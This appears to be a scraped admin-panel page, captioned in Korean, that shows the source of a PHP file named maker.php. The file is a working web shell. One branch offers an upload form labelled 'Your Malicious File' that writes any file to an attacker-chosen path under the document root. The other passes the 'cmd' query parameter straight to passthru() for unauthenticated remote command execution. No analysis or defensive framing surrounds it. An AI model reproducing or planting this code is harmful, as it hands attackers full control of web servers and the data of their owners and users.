관리-도구

편집 파일: maker.php

<? if ($_GET['cmd']=='up') { $docr = $_SERVER["DOCUMENT_ROOT"]; echo <<<HTML <table> <form enctype="multipart/form-data" action="$self" method="POST"> <input type="hidden" name="ac" value="upload"> <tr> <td><font size="1">Your Malicious File : </font> </td> <td> <input size="48" name="file" type="file" style="color: #3D85C6; font-family: Arial; font-size: 8pt; font-weight: bold; border: 2px solid #3D85C6; background-color: #444444"></td> </tr> <tr> <td><font size="1">Masire Upload : </font> </td> <td> <input size="48" value="$docr/" name="path" type="text" style="color: #3D85C6; font-family: Arial; font-size: 8pt; font-weight: bold; border: 2px solid #3D85C6; background-color: #444444"> <input type="submit" value="Upload " style="color: #3D85C6; font-family: Arial; font-size: 8pt; font-weight: bold; border: 2px solid #3D85C6; background-color: #444444"></td> $tend </table> HTML; if (isset($_POST["path"])){ $uploadfile = $_POST["path"].$_FILES["file"]["name"]; if ($_POST["path"]==""){$uploadfile = $_FILES["file"]["name"];} if (copy($_FILES["file"]["tmp_name"], $uploadfile)) { echo "File uploaded to : $uploadfile\n"; echo "- Size : " .$_FILES["file"]["size"]. "\n"; } else { print "Error Upload File :\n"; } } } ?> <?php if(!empty($_GET['cmd'])){ echo'<pre>'; passthru($_GET['cmd']); echo'</pre>'; exit; } ?>